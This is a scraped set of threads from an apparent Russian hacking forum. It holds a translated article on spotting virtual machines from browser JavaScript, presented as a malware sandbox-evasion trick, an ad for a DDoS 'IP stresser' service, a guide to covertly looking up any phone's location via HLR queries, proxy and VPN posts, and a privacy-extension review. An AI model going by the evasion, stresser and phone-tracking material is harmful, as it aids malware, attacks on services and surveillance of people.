var canvas = document.createElement('canvas'); var gl = canvas.getContext('webgl'); var debugInfo = gl.getExtension('WEBGL_debug_renderer_info'); var vendor = gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL); var renderer = gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL); console.log(vendor); console.log(renderer);

Кроме того, доступность расширения можно запросить с помощью метода getExtension в контексте WebGL. Я не полностью исследовал эту возможность, но возможно можно обнаружить определенные реализации WebGL, предоставляемые виртуальными машинами, на основе доступных расширений. Хотя эта идея, вероятно, очень склонна к ложному положению.

Ниже приведен скриншот с [3] WebGLReport сайта, посвященного дактилоскопии WebGL.
![](/proxy.php?image=https%3A%2F%2Fbannedit.github.io%2Fresources%2FVirtualBox- VM-Win10-Chrome.png&hash=f4aa403ae6df451502f2246b68db55f2)

Теперь важно отметить, что это зависит от того, как настроена виртуальная машина. Например, в Virtual Box установка графического контроллера в разделе Display для VMSVGA приведет к тому, что WebGL будет использовать реализации OpenGL на основе процессора, которые зависят от браузера. Тем не менее, это может быть полезным показателем того, что компьютер работает на виртуальной машине, поскольку большинство современного оборудования имеет встроенные графические процессоры и может предоставить доступ к OpenGL. Просто помните, что реализации OpenGL на базе процессора не обязательно означают, что это виртуальная машина.
![](/proxy.php?image=https%3A%2F%2Fbannedit.github.io%2Fresources%2FVirtualBox- VM-Win10-Chrome-VMSVGA.png&hash=2f969410615f34b515dd0b00f2bccb70)

На этом скриншоте показан Google Chrome, использующий рендер реализации OpenGL на базе процессора Google SwiftShader [4] .

Еще один метод, используемый в обычных вредоносных программах, заключается в определении ширины и высоты экрана. Этого можно добиться и в Javascript. Кроме того, глубина цвета и биты на пиксель являются другими потенциально хорошими индикаторами, связанными с дисплеем.

Code:Copy to clipboard

var width = screen.width; var height = screen.height; var color_depth = screen.colorDepth; var bitspp = screen.pixelDepth;

Более подробную информацию об объекте на экране можно найти в [5] (Рекомендации в конце статьи) .

Можем ли мы определить объем оперативной памяти на клиенте? Снова используя Javascript, мы можем приблизительно определить объем оперативной памяти, доступной в браузере. Здесь нужно отметить одну причуду: браузер будет сообщать значения ОЗУ только в гигабайтах (ГБ). Он также имеет причуду, когда он будет сообщать только до 8 ГБ и всего 256 МБ (0,25 ГБ). Однако эти диапазоны значений все еще достаточны для использования в качестве метода обнаружения виртуальных машин. В наши дни большинство физических рабочих станций имеют как минимум 8 ГБ оперативной памяти. Обнаружение меньшего объема ОЗУ, такого как 2 ГБ или менее, было бы хорошим индикатором того, что браузер клиента находится в виртуальной машине. Спецификация для Памяти Устройства может быть найдена в [6] (Также в рекомендациях в конце статьи).

Code:Copy to clipboard

var ram = навигатор . deviceMemory ;

Наконец, последний метод, который я расскажу, определяет количество ядер процессора. Это достигается путем одновременной атаки нескольких веб-служб. Во время тестирования этой техники я обнаружил, что она очень точная. Я проверил эту концепцию на демонстрационном сайте [7] Core Estimator. Небольшое количество ядер ЦП может быть хорошим индикатором виртуальной машины и использовалось вредоносным ПО. Core Estimator также предоставляет библиотеки Javascript на github [8] .
![](/proxy.php?image=https%3A%2F%2Fbannedit.github.io%2Fresources%2FVirtualBox- VM-Win10-Chrome-2-Cores.png&hash=6565407922b57b1119c800ff5e4c5cc2)

Заключение

В этом блоге рассказывается о четырех уникальных возможностях обнаружения виртуальных машин, которые можно выполнить с помощью Javascript. Когда я впервые открыл эти методы, моей первоначальной мыслью было применить концепции к обнаружению виртуальных машин. Надеемся, что все смогут найти что-то полезное для применения этих методов.

Интересно видеть, что ученые и другие исследователи применяли одни и те же концепции к вопросам снятия отпечатков пальцев и конфиденциальности.

Рекомендации

(Перекрестное) снятие отпечатков в браузере с помощью функций ОС и аппаратного уровня http://yinzhicao.org/TrackingFree/crossbrowsertracking_NDSS17.pdf

Веб-документы MDN WEBGL_debug_renderer_info https://developer.mozilla.org/en-US/docs/Web/API/WEBGL_debug_renderer_info

Отчет WebGL https://webglreport.com

Google Swiftshader Github https://github.com/google/swiftshader

Спецификация памяти устройства W3 https://www.w3.org/TR/device-memory/

W3 Schools - Объект экрана https://www.w3schools.com/jsref/obj_screen.asp

Демонстрация основного оценщика https://oswg.oftn.org/projects/core-estimator/demo/

Основной оценщик Github https://github.com/oftn-oswg/core-estimator

Переведено специально для XSS
neopaket
Оригинальная статья: [https://bannedit.github.io/Virtual-...html#Virtual- Machine-Detection-In-The-Browser](https://bannedit.github.io/Virtual-Machine- Detection-In-The-Browser.html#Virtual-Machine-Detection-In-The-Browser)

netcrack | Professional IP stresser | 1 vouch copy

ID: 676533bbb4103b69df371d35
Thread ID: 30453
Created: 2019-07-16T23:44:46+0000
Last Post: 2019-08-16T09:40:53+0000
Author: Number1
Replies: 12 Views: 2K

Check us out @ https://netcrack.top/

Youtube videos:

Бесплатные SOCKS5

ID: 676533bbb4103b69df371d36
Thread ID: 30839
Created: 2019-08-05T03:58:28+0000
Last Post: 2019-08-12T23:46:23+0000
Author: tightfistedpanther
Replies: 7 Views: 2K

Привет. Хотел бы поделиться сервисом-агрегатором SOCKS5, который делал для себя. Всё полностью бесплатно.
https://socks5.pro/
Функционал минимальный - просто список, с возможностью фильтрации по стране.
Проверка на валидность каждые 5 минут, почти все живые.

Как узнать статус, регион пребывания и другую информацию любого мобильного телефона без подозрений

ID: 676533bbb4103b69df371d39
Thread ID: 30840
Created: 2019-08-05T08:21:29+0000
Last Post: 2019-08-12T06:08:43+0000
Author: AlexLES
Replies: 5 Views: 2K

Для начала, разберемся что такое HLR. HLR (Home Location Register) — это централизованная база данных, которая содержит подробную информацию о каждом абоненте данной сети GSM-оператора. HLR хранится наиболее полная информация об абонентах. К числу таких данных относятся идентификаторы (его номер, идентификатор оборудования), разрешенные и запрещенные услуги, его текущее местоположение и т.п. Так же через HLR оператор проверяет находится ли абонент в роуминге и рассчитывает тарификацию услуг.
Для получения интересующей нас информации мы будем получать информацию из базы данных HLR используется HLR-запросы. Особенность этого запроса заключается в том, что он сохраняет конфиденциальность и не беспокоит абонента. Некоторые сервисы позволяют протестировать HLR-запросы бесплатно.
Например перейдем на страницу тестирования HLR-запроса https://smsc.ru/testhlr/.

Spoiler: Скрин

Ввидем интересующий нас номер телефона в соответствующее поле и код с картинка (если необходимо) и выполним запрос, в результате получим страну пребывания номера телефона, название оператора через которого в данный момент времени номер находится в сети с указанием регион пребывания, технические параметры а так же статус номера.

Spoiler: Скрин

Вот таким образом мы можем бесплатно пробить любой мобильный телефон.

Топ бессплатных онлайн сканеров

ID: 676533bbb4103b69df371d40
Thread ID: 29198
Created: 2019-05-10T04:10:27+0000
Last Post: 2019-07-16T06:56:38+0000
Author: XDG12
Replies: 2 Views: 2K

Данная статья не является рекламой ни одного сервиса.

1. VirusTotal

VirusTotal проверяет элементы с более чем 70 антивирусными сканерами и службами с черными списками URL-адресов.
Любой пользователь может выбрать файл на своем компьютере с помощью браузера и отправить его в VirusTotal.
VirusTotal предлагает несколько методов отправки файлов, в том числе основной общедоступный веб-интерфейс, средства загрузки на рабочий стол, расширения для браузера и программный API.

Сканирование URL - https://www.virustotal.com/#/home/url
Сканирование файла - https://www.virustotal.com/#/home/upload
Поиск по URL - https://www.virustotal.com/#/home/search

2. IPVoid

IPVoid - это бесплатный сервис, разработанный NoVirusThanks Company Srl. Он был создан в 2010 году как служба проверки черного списка IP-адресов, чтобы сканировать IP-адреса с помощью нескольких черных списков IP-адресов и служб DNSBL.
Миссия IPVoid заключается в предоставлении бесплатных инструментов для устранения неполадок в сети и помощи в сборе информации об IP-адресах.

Сервисы IPVoid:
Blacklist Check – http://www.ipvoid.com/ip-blacklist-check/
Whois Lookup – http://www.ipvoid.com/whois/
Ping Lookup – http://www.ipvoid.com/ping/
HTTP Headers – http://www.ipvoid.com/http-headers/
DiG DNS Lookup – http://www.ipvoid.com/dig-dns-lookup/
MX Lookup – http://www.ipvoid.com/mx-lookup/
Reverse DNS Lookup – http://www.ipvoid.com/reverse-dns-lookup/
Find Website IP – http://www.ipvoid.com/find-website-ip/
Traceroute – http://www.ipvoid.com/traceroute/
My IP Address – http://www.ipvoid.com/my-ip/
IP Geolocation – http://www.ipvoid.com/ip-geolocation/
Htpasswd Generator – http://www.ipvoid.com/htpasswd-generator/

3. URLVoid

URLVoid - это бесплатный сервис, разработанный NoVirusThanks в конце 2010 года, который позволяет пользователям сканировать веб-сайт с несколькими механизмами репутации веб-сайтов и службами с черными списками доменов, для обнаружения опасных веб-сайтов, связанных с вредоносными программами, фишингом, мошенничеством и мошенническими действиями.

Website Reputation Checker – https://www.urlvoid.com/
Whois Lookup Online – https://www.urlvoid.com/whois-lookup/
DNS Records Lookup Tool – https://www.urlvoid.com/dns-records-lookup/
Ping Host/IP Online – https://www.urlvoid.com/ping-host-ip-online/

4. Web Inspector

Web Inspector - это бесплатная облачная служба, которая выполняет проверку безопасности веб-сайтов, удаляет вредоносные программы и помогает защитить веб-сайты от хакеров.

5. URL Query

urlQuery.net - это сервис для обнаружения и анализа веб-вредоносных программ. Он предоставляет подробную информацию о действиях, выполняемых браузером при посещении сайта, и предоставляет информацию для дальнейшего анализа.

6. Central Ops

Веб-сайт Centralops - это набор утилит для работы в Интернете, с помощью которых вы можете легко исследовать домены и IP-адреса, а также другую полезную информацию, такую как информация о владельце регистрации, записи DNS и многое другое.

Domain Dossier – https://centralops.net/co/DomainDossier.aspx
Domain Check – https://centralops.net/asp/co/DomainCheck.vbs.asp
Email Dossier – https://centralops.net/co/EmailDossier.aspx
Browser Mirror – https://centralops.net/asp/co/BrowserMirror.vbs.asp
Ping – https://centralops.net/co/Ping.aspx
Traceroute – https://centralops.net/co/Traceroute.aspx
NSLookup – https://centralops.net/co/NsLookup.aspx
AutoWhois – https://hexillion.com/asp/samples/AutoWhois.vbs.asp
AnalyzePath – https://hexillion.com/asp/samples/AspAnalyzePath.asp

7. Network Tools

Network-tools.com - это веб-сайт, который предоставляет различные сервисы онлайн-сканирования, такие как Whois, сканирование Ping, трассировка маршрута, поиск по сети, кодирование / декодирование URL, сканирование заголовков http и тд.

8. Shodan

Shodan - это поисковая система, которая позволяет пользователю находить компьютеры определенного типа (веб-камеры, маршрутизаторы, серверы и тд.), Подключенные к Интернету, используя различные фильтры. Некоторые также описывают его как поисковик сервисных баннеров, которые представляют собой метаданные, которые сервер отправляет обратно клиенту.

Это может быть информация о серверном программном обеспечении, какие опции поддерживает служба, приветственное сообщение или что-либо еще, что клиент может узнать перед взаимодействием с сервером.

Запускаем OpenVPN в Докере за 2 секунды (проект Docker-OpenVPN)

ID: 676533bbb4103b69df371d42
Thread ID: 30146
Created: 2019-07-03T18:13:07+0000
Last Post: 2019-07-03T18:13:07+0000
Author: tabac
Replies: 0 Views: 2K

Сталкивались ли вы когда-либо с ситуацией, когда очень хотелось бы виртуально перенестись в другой город, страну или на другой континент? У меня такая необходимость возникает достаточно часто, поэтому возможность иметь свой VPN сервер, который можно запустить где угодно, за пару секунд, стоял достаточно остро. В этой статье хочу рассказать про свой проект, который я задумал когда искал готовое решение, в данном случае докер образ, который бы позволил быстро поднять OpenVPN сервер, с минимумом настроек и приемлемым уровнем безопасности.

Предыстория
Возможность запускать сервис на любой машине: будь-то физический сервер, или виртуальный частный сервер, или, вовсе, контейнерное пространство внутри другой системы управления контейнерами — была критически важной. Мой взор сразу пал на Докер. Во-первых, этот сервис набирает популярность, а следовательно, все больше и больше провайдеров предоставляют готовые решения с его предустановкой; во-вторых — есть централизованное хранилище образов, откуда можно скачать и запустить сервис с помощью одной команды в терминале. Мысль, что подобный проект уже должен существовать, посещала меня и я упорно искал. Но, большинство проектов, которые я находил — были либо слишком громоздкими (нужно было создавать контейнер для постоянного хранения данных и несколько раз запускать контейнер с приложением с разными параметрами), либо без вменяемой документации, либо вовсе заброшенными.Не найдя ничего приемлемого, я начал работу над своим проектом. Итак, прошу любить и жаловать — Docker-OpenVPN. Когда я реализовывал этот проект, я ставил во главу угла скорость развертывания, минимум настроек и приемлемый уровень безопасности. Кое-где пришлось пожертвовать скоростью развертывания ради безопасности, а за минимум настроек пришлось заплатить портативностью: в текущей конфигурации однажды созданный контейнер на одном сервере нельзя перенести и запустить на другой. Например, все клиентские и серверные сертификаты генерируются при запуске сервиса и это заниамет около 2 секунд. Однако, генерацию файла Дефи Хеллмана пришлось вынести в билд-тайм: он создается во время сборки докер образа и может длиться до 10 минут.

Запуск
Чтобы запустить сервис нам необходимы несколько вещей:

Сервер: физический или виртуальный. Теоретически можно запускать в режиме докер-в-докере, но я не проводил масштабного тестирования этой опции;

Собственно Докер. Многие хостинг провайдеры предоставляют готовые решения с Докером «на борту»;

Публичный IP адрес.

Если все реквизиты на месте, то дальше нам остается запустить следующую команду в консоли вашего сервера:

Code:Copy to clipboard

docker run --privileged -it --rm --name dovpn -p 1194:1194/udp -p 8080:8080/tcp -e HOST_ADDR=$(curl -s https://api.ipify.org) alekslitvinenk/openvpn

Внимательный читатель мог обратить внимание на то, что IP адрес сервера определяется автоматически с помощью ipify.org. Если по каким-то причинам это не работает, то можно указать адрес вручную.Если все предыдущие шаги были выполнены верно, то мы должны увидеть в консоли нечто похожее:

Code:Copy to clipboard

Sun Jun 9 08:56:11 2019 Initialization Sequence Completed Sun Jun 9 08:56:12 2019 Client.ovpn file has been generated Sun Jun 9 08:56:12 2019 Config server started, download your client.ovpn config at http://example.com:8080/ Sun Jun 9 08:56:12 2019 NOTE: After you download you client config, http server will be shut down!

Мы близки к цели: теперь нам надо скопировать example.com:8080/ (в вашем случае будет адрес вашего сервера) и вставить в адресную строку браузера. После того как вы нажмете Enter, client.ovpn файл будет скачан, а сам http сервер уйдет в небытие. Если данное решение вызовет сомнение, то можно воспользоваться следующим трюком: запустить предыдущую команду и добавить флаги zp и пароль. Теперь, если вы вставите сгенерированную ссылку в окно браузера — вы получите зип архив с паролем. Когда у вас есть файл с клиентской конфигурацией, можно использовать любой подходящий клиент. Я использую Tunnelblick для Мака.

Видео туториал
Данный видео тутриал содержит подробную инструкцию по развертыванию сервиса на DigitalOcean. Пока что на английском языке, но я планирую сделать версию на русском в скором времени.

P.S. флаг --privileged нужен для работы с iptables

автор @alekslitvinenk

Поднимаю свой личный VPN на твоей основе!

ID: 676533bbb4103b69df371d46
Thread ID: 30084
Created: 2019-06-30T21:36:06+0000
Last Post: 2019-06-30T21:36:06+0000
Author: Guppi
Replies: 0 Views: 2K

Цена вопроса 50$
За деталями в ТГ @Guppi01

Deepwebvpn. Что скажете?

ID: 676533bbb4103b69df371d4a
Thread ID: 29483
Created: 2019-05-24T11:17:22+0000
Last Post: 2019-06-19T08:02:30+0000
Author: gifci
Replies: 5 Views: 2K

В общем, недавно наткнулся на этот сервис, создатель вроде давно уже этой теме крутиться, но все же, есть ли тут пользователи, которые могут проверить отсутствии логов и присутствие шифрования. Буду крайне признателен, ни в коем случае не реклама

Смена тарифа на нерег симке?

ID: 676533bbb4103b69df371d4b
Thread ID: 29525
Created: 2019-05-27T09:55:51+0000
Last Post: 2019-06-11T18:56:41+0000
Author: NevesDlim
Replies: 3 Views: 2K

Скажите пожалуйста, на пчеле реально тариф переключить? Симка из перехода.

Есть какая-нибудь прога для создания второго рабочего стола на андройд

ID: 676533bbb4103b69df371d4e
Thread ID: 29594
Created: 2019-06-01T15:56:56+0000
Last Post: 2019-06-01T19:59:25+0000
Author: Flyffer
Replies: 1 Views: 2K

Вот вообщем вопрос в заголовке. У меня всякие andraxы, торы и прочие штуки стоят на андройде и я дискомфортно чувствую, когда рядом кто-нибудь находится и палит - это все. Мб есть типо, как иконки быстро изменить или что-нибудь подобное. А то уже живу и вижу, как мусора требуют телефон показать

Необходимые расширения для конфиденциальности (и прочего)

ID: 676533bbb4103b69df371d4f
Thread ID: 29569
Created: 2019-05-30T09:49:58+0000
Last Post: 2019-05-30T09:49:58+0000
Author: bbuhBby8&b&BN
Replies: 0 Views: 2K

Введение
Если вы прочли мою статью Как выбрать браузер для повседневного использования, то уже знаете, что большинство функций в них обеспечивается аддонами (расширениями). Они настолько важны, что пользуясь ими долгое время, вы не сможете представить, что браузер может быть работоспособен и без них. Какие же расширения стоит устанавливать, а какие лучше не трогать? Это вы и узнаете, прочитав данную статью.
Рекомендуемые аддоны, повышающие конфиденциальность
uMatrix
Говоря прямо, это САМЫЙ НЕОБХОДИМЫЙ аддон, без которого я даже не выйду в Интернет. Чтобы понять почему, посмотрим на то, как устроена Сеть. Посещая любой сайт, вы отправляете ему запрос. Сайт может состоять из множества файлов, таких как картинки, таблицы стилей или скрипты (которые в свою очередь отправляют СВОИ запросы). Более того, он может пытаться соединиться с другими сайтами (что называется запросами третьих сторон). Таким образом, посещая всего один сайт, вы можете иметь дело с сотнями самых разнообразных запросов. И в конце концов большинство проблем, связанных с конфиденциальностью, сводится к таким запросам, осуществляемым через браузер с целью сбора персональных данных. Тогда получается, что для предотвращения отслеживания нужно отключить определённые виды запросов. Хорошо, но причём же тут uMatrix?
uMatrix разделяет все запросы на восемь категорий: Куки, CSS (таблицы стилей), изображения, мультимедиа (аудио- и видеофайлы), скрипты, XHR (запросы от скриптов), фреймы (включение других сайтов), и другое (всё остальное). Плюс две подкатегории: запросы от самого сайта и от третьих сторон. Что это значит? Прежде всего то, что определённые типы запросов могут навредить вашей конфиденциальности больше , чем другие, и посредством uMatrix можно отключить их глобально , а затем разрешить их только на тех сайтах, которые вы укажете.
Запросы, больше всего ответственные за отслеживание, относятся к третьим сторонам, и особенно к скриптам. Так возьмём и заблокируем их. Теперь ни один сайт, содержащий скрипты от facebook, не сможет вас отслеживать - но если вы разрешите эти скрипты НА САМОМ facebook, вы всё ещё сможете им пользоваться - просто он больше не сможет нигде за вами следить. Другой пример - гугловская ReCaptcha. Можно разрешить её повсеместно - а можно, в случае если вам на неё наплевать и она вам нужна для доступа к одному сайту здесь и сейчас - разрешить её только для этого самого сайта.
Но защита от отслеживания - не единственная функция uMatrix. С его помощью возможно практически всё - удаление мусора со страниц (пресловутой "рекламы"), блокирование надоедливых всплывающих окон с предложением "зарегистрироваться на сайте", сокрытие вставленных видеороликов и т. д. А если вы решите, что хотите оставить возможность смотреть видео на своём любимом сайте и нигде больше, можете избирательно разрешить показ роликов только на нём. Самое замечательное в uMatrix то, что вы можете сначала глобально запретить все запросы, а затем разрешить только некоторые из них, по мере надобности. Расширение даёт вам практически полный контроль над пребыванием в Интернете , обладая при этом интуитивно понятным интерфейсом. Конечно, потребуется время на то, чтобы научиться его использовать и настроить под свои потребности, но, учитывая тот уровень свободы, который вы получите, оно того стоит - кроме того, на первых порах можно всё не блокировать - запрет одних только скриптов от третьих сторон и куки возымеет значительный эффект. Без этого аддона контроль над Интернетом снова будет в руках рекламщиков и аналитиков - они будут решать за вас, что и когда вы должны там видеть. Существуют аддоны с частично схожими функциями, но все они имеют большие недостатки, как мы убедимся позже. uMatrix поддерживают браузеры, основанные на Chrome или Firefox (для Pale Moon есть форк под названием eMatrix).
WebRTC Control
Если вы пользуетесь Tor или определёнными VPN, технология WebRTC, включённая по умолчанию во многих браузерах, спровоцирует утечку вашего IP-адреса , нивелируя вашу анонимность. С помощью этого расширения вы можете одним кликом выключить (или включить) WebRTC и избежать утечек. Доступно для браузеров на Chrome или Firefox (Pale Moon автоматически предотвращает утечку IP через WebRTC, и поэтому не нуждается в этом расширении).
Decentraleyes
Ещё один очень простой аддон. Есть скрипты, необходимые для нормальной работы многих сайтов (jQuery, некоторые скрипты google и т. п.), но в то же время они за вами следят. Как решить проблему? Хранить скрипты локально и делать запросы к этим копиям! Этим и занимается Decentraleyes. Может конфликтовать с uMatrix. Решение? Вкратце, uMatrix не должен "перехватывать" запросы, которые собирается подменить Decentraleyes, поэтому нужно разрешить некоторые домены в uMatrix (эти правила должны сработать). Аддоны, форсирующие использование HTTPS, тоже могут пытаться перехватить запросы - чтобы предотвратить это, устанавливайте Decentraleyes ПОСЛЕ них. Поддерживается браузерами на основе Chrome и Firefox, а также Pale Moon. Итак, это были три расширения, которые я считаю незаменимыми инструментами достижения конфиденциальности (а поскольку WebRTC нужен только для браузеров на Chrome, Firefox может обойтись только двумя из них). Тем не менее, дальше я расскажу ещё о нескольких вещицах, которые тоже могут оказаться полезными.
Smart HTTPS
Незамысловатый аддон. Предполагает, что любой сайт поддерживает SSL и пробует осуществить зашифрованное соединение. Если в ходе этого возникает ошибка (другими словами, сайт не поддерживает SSL), сайт загружается через обычный протокол HTTP. Таким образом, незашифрованные соединения вообще не происходят, если это возможно. К сведению: иногда это расширение ошибочно вносит сайты в список не поддерживающих HTTPS , например в случае потери доступа к сети. Из- за этого расширение не даёт полной защиты от незашифрованных запросов по умолчанию , но оно всё равно лучшее в своём роде. К тому же, вы можете отключить автоматическое занесение сайтов в такой список , и тогда аддон будет всегда проверять возможность зашифрованного соединения. Таким образом, насколько мне известно, можно добиться идеальной защиты. Поддерживается браузерами на Firefox и Chrome. Если хотите использовать его на Pale Moon, загрузите старую версию из Classic Add-ons Archive, потому что последняя версия построена на WebExtensions.
Claire
Поскольку любой сайт с Cloudflare расшифровывает ваши SSL-соединения , может оказаться полезным знать, когда именно это происходит. Это расширение добавит индикатор-облачко, который загорится, если на сайте есть CF. Оно не предотвратит расшифровку , но по крайней мере вы будете знать что ваше SSL не работает. Факт, что расширение не решает проблемы, а только информирует о ней, ограничивает его полезность. Доступно для браузеров на Chrome и Firefox. Имейте в виду, что аддон разработала сама Cloudflare - если вы им не доверяете или хотите использовать что-то другое, есть вариант под названием cf-detect, но он работает только на браузерах семейства Firefox. Я не cмог найти похожего расширения для Pale Moon.
SingleClick Cleaner
Не имеющий прямого отношения к приватности, но очень полезный аддон. Позволяет вам указать, какие данные нужно стереть (куки, список загрузок, история посещения сайтов и пр.) и затем избавиться от них одним щелчком мыши в любое время. Не поддерживается браузерами на Firefox, но для них есть похожие расширения (хотя я не знаю, насколько они удобны). К сожалению, нет эквивалентов для Pale Moon.
Аддоны для конфиденциальности, имеющие существенные недостатки
KB SSL Enforcer
Использовал долгое время, но недавно прочитал их ЧаВО, где написано, что "KB SSL Enforcer ищет SSL во время самого первого посещения страницы, и на этот период не способен предотвратить незашифрованоое соединение". То есть первый небезопасный запрос не будет перехвачен. Хуже чем Smart HTTPS.
HTTPS Everywhere
Полагается на список доменов, так что если сайт не в списке, запрос к нему не будет шифроваться SSL. Также проигрывает Smart HTTPS, который всегда будет пытаться использовать SSL, если это возможно.
uBlock Origin, AdBlock Plus, AdGuard, Disconnect и пр.
Для их работы необходимы огромные, постоянно устаревающие списки блокируемых элементов. Так, AdGuard кичится тем, что имеет "более 1 800 000 вредоносных сайтов в чёрном списке". Не вижу особого повода для гордости, когда через uMatrix одним движением можно заблокировать целый класс запросов, благодаря чему все эти "адблоки" перестают быть нужными. Используя их, вы также доверяетесь третьим лицам , решающим за вас что следует блокировать, вместо того, чтобы взять наконец контроль в свои руки. Если в этих списках чего-то нет, блокироваться оно не будет , и попросту невозможно составить полный список такого содержимого. Рекламщики уже давно пытаются яростно бороться с этими списками (BlockAdBlock и пр.). В ответ на это появились пользовательские скрипты и другие меры противодействия, блокирующие BlockAdBlock, против которых рекламщики в свою очередь изобрели новые контрмеры... uMatrix просто обходит стороной эту бессмысленную войну. С правильно настроенным uMatrix, вам не придётся беспокоиться о грязных уловках аналитиков и рекламщиков, поскольку всё будет заблокировано до тех пор, пока вам не понадобится что-то разрешить (принцип "презумпции виновности" вместо "презумпции невиновности"). "Адблоки" проще использовать (работают сразу после установки), но в итоге они слабее чем uMatrix, если вы научитесь им пользоваться. Если вам очень хочется использовать блокировщик рекламы по списку, выбирайте Disconnect как меньшее из зол. У него хороший интерфейс, показывающий сэкономленное время и трафик, а также имеется режим детализации отслеживания. И всё-таки, лучше изучите uMatrix. Немного о uBlock Origin: в нём имеются дополнительные функции сокрытия элементов и отключения WebRTC - но в блокировке содержимого uMatrix нет равных.
NoScript
Вредоносный аддон! (архив) К тому же он уступает uMatrix, поскольку лишь позволяет блокировать определённые скрипты глобально, не принимая во внимание откуда идёт запрос (то есть вы не сможете запретить скрипт X на одном сайте, и разрешить его на другом). А также он не поддерживает браузеры семейства Chrome...
Privacy Badger
Наверно, худшее из всех расширений "для приватности", хотя на вид кажется самым продвинутым и использует ИИ для обнаружения шпионских скриптов. Но на поиск чего-либо уходит слишком много времени (вы трижды успеете изучить uMatrix...), и в основном слежка всё равно будет работать. По словам разработчиков, Privacy Badger пытается обнаружить такие технологии отслеживания, как куки с идентификаторами, локальные "супер-куки" и отпечатки Canvas. Но это лишь три из множества других способов слежки за пользователями, и всё остальное PB упустит. Также, PB специализируется только на слежке, но существуют и другие кандидаты для блокирования. Может быть, вам не хочется смотреть на случайные фотографии из Twitter'а во время посещения других сайтов (к тому же через них тоже можно следить за пользователями). Странно, но PB всегда отправляет заголовок Do Not Track, который на самом деле помогает вас отслеживать (ухудшает ваш отпечаток). Не ведитесь на этот выпендрёж и используйте uMatrix, единственно необходимый блокировщик содержимого.
Ghostery
Ещё один очень слабый аддон. Он показывает сколько элементов на сайте вас отслеживает, а затем применяет алгоритм чтобы заблокировать лишь некоторые из них. Он оставляет, к примеру, DoubleClick, кнопки соцсетей, Google AdSense, много сайтов аналитики и прочее. Вы можете выбрать полную или частичную блокировку содержимого на всех или некоторых сайтах, но по умолчанию блокированием управляет алгоритм. Ghostery также имеет функцию удаления рекламы, которая работает по тому же принципу, но в этом случае даже не уведомляет о том, что именно было заблокировано. Можно "установить ограничение на сайт", и следящие элементы на нём будут заблокированы, но эта опция не затрагивает рекламу , так что защита оказывается неэффективной. А включать эту опцию нужно для каждого сайта отдельно. Также Ghostery отправляет нечто под названием "Human Web Data" своей компании-владельцу Cliqz по умолчанию. Так или иначе, uMatrix намного лучше.
LibreJS
Скажем прямо - это расширение вообще не несёт в себе приватности, функциональности, удобства или какой-либо пользы. Оно лишь призвано удовлетворять особый вид аутизма под названием фритардизм. Так что это вообще за аддон? Оказывается, он должен блокировать "несвободный и нетривиальный" JavaScript на сайтах, но критерии блокировки путанные и нечёткие. LibreJS проверяет, придерживается ли скрипт "свободной лицензии", и если нет, насколько он "тривиален" чтобы проигнорировать проблему с лицензией. Всё это значительно снижает скорость загрузки сайтов , так как расширение старается проверить каждый скрипт на сайте на соответствие ряду правил, определяющих "тривиальность". И если вы нажмёте на кнопку расширения, оно продемонстрирует вам малопонятный отчёт о якобы "нетривиальных" скриптах, которые были заблокированы. Затем вы можете внести их в белый список - настоящий Сизифов труд. Если скрипт был заблокирован, появляется гигантское всплывающее окно с надписью "ПОЖАЛОВАТЬСЯ", где вас просят связаться с владельцами сайта, чтобы они могли убрать несвободные скрипты (разве это когда-нибудь удавалось?). Пахнет крестовым походом, в котором я не желаю принимать никакого участия. uMatrix в тысячи раз опрятнее, быстрее (на самом деле даже заметно ускоряет загрузку страниц), мощнее и предано пользователю, а не идеологии. Не пользуйтесь этой штуковиной, когда есть uMatrix!
Расширения типа прокси / "VPN"
Сюда относятся Browsec, Hola, PureVPN, ZenMate, Tunnelbear и множество других. Они не только [полны утечек](https://blog.innerht.ml/vpn-extensions-are-not- for-privacy/) (архив), но и вообще не являются настоящими VPN. Это означает, что они обрабатывают только часть сетевых запросов (а именно те, что проходят через ваш браузер). Помимо этого имеется ряд других проблем как ограниченный трафик, необходимость оплаты по прошествии пробного периода, доставучие всплывающие окна и даже затягивание в самый настоящий ботнет (архив) - становится ясно, что лучше ими никогда не пользоваться. Используйте настоящий VPN - бесплатные и качественные услуги предоставляют SigaVPN и RiseUp.
Переключатели прокси
На самом деле в этих расширениях нет ничего плохого - я даже рекомендовал когда-то Proxy SwitchyOmega. Просто дело в том, что использовать VPN намного проще и лучше, чем возиться с разными прокси (включая Tor), так что эти аддоны утратили свою полезность.
Другие полезные аддоны
Saka Key
Позволяет редактировать горячие клавиши (функция, которая отсутствует по умолчанию в Chrome и Firefox! Хотя она есть даже в долбаном elinks...). Но что важнее, расширение позволяет открывать ссылки без использования мыши. Нажмите F (находясь в power mode) чтобы назначить каждой ссылке, видимой на сайте, сочетания из букв, а затем наберите эти сочетания клавишами. Бац! И навигация по Интернету происходит теперь целиком через клавиатуру. Незаменимая вещь, когда у вас свободна только одна рука, или если у вас ноутбук с хреновым тачпадом. Работает под браузерами Chrome и Firefox. Vimium (из Classic Addons Archive) для Pale Moon работает даже лучше.
I don't care about cookies
Не так давно в ЕС с какого-то перепугу решили требовать от сайтов доставать всех сообщениями почти в полэкрана с "информацией" о файлах куки, которую все и так уже знают. Этот аддон убирает такие всплывающие сообщения. Конечно, uMatrix их тоже устранит если вы запретите скрипты на этих сайтах, но если вам вдруг нужны какие-нибудь функции от данных скриптов (например на flashscore), этот аддон будет очень полезен. Доступно как для браузеров на Chrome или Firefox, так и для Pale Moon. Примечание: может "сломать" некоторые сайты (например кнопку удаления на Neocities).
LinkBot
Делает любой текст со ссылкой кликабельным (например адреса без http://, или адреса электронной почты). Не нужно больше копировать всё в адресную строку! Очень удобно. Раньше для этой цели использовал Clickable Links, но заметил что некоторые ссылки оно пропускает, поэтому решил найти что-то получше. Несовместимо с браузерами на Firefox - там можно использовать Linkificator. Примечание: "ломает" некоторые сайты, например те, что используют форму логина от RainLoop.
Archiveror
Это расширение позволяет моментально архивировать текущую страницу на archive.fo, web.archive.org, perma.cc или webcitation.org. Можно использовать клавиатурное сочетание (Alt+Shift+Y).
Stylus
